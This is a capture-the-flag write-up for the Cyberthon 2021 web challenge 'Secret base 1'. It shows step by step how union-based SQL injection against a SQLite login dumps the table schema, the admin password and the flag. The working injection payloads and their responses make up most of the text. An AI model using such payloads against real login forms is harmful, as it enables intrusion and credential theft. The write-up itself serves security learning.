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Secret base 1

In Cyberthon 2021, 1 points

APOCALYPSE hired an administrator improve the physical security of their secret base. Your task is to gain access to the physical security device. The flag for this challenge is similar to 15{h...e} (starts with 'h' and ends with 'e').

Secret base 1

Category: Web

APOCALYPSE hired an administrator improve the physical security of their secret base. Your task is to gain access to the physical security device.

The flag for this challenge is similar to Cyberthon{h...e} (starts with 'h' and ends with 'e').

This is a typical SQL injection challenge without any filters. Database is sqlite, with table users_table from a HTML comment in the login page.

Starting with payload username = admin';# we get an error that the password for admin is incorrect. Thus, the query executed is probably something like

data = query(f"select * from users_table where username='{username}'")
if (data["password"] == password):
   # ...

We can use union SQL injection to control returned password. But first, we need to find out how many columns there are in the users_table. username = a' union select 'a', 'b', 'c';# produces no error so there are 3 columns. Additionally we get a message Invalid password for b, so the second column is the username. Let's investigate further by dumping the SQL of the users_table.

Payload: username = a' union select 'a', sql, 'c' from sqlite_master where tbl_name='users_table';#
Response: Invalid password for CREATE TABLE users_table(id INTEGER PRIMARY KEY, username TEXT, password TEXT)!

Our hypothesis is correct. We can continue to use this approach to dump more info from the table.

Payload: username = a' union select 'a', password, 'c' from users_table;#
Response: Invalid password for Adm1nP@s5w0rd123!@#!

Presumably, this is the admin's password. Still no flag tho. Let's look at other users' passwords

Payload: username = a' union select 'a', password, 'c' from users_table where username not like 'admin';#
Response: Invalid password for Cyberthon{h3re5_0nE_f1Ag_1N_d@taBa5e}!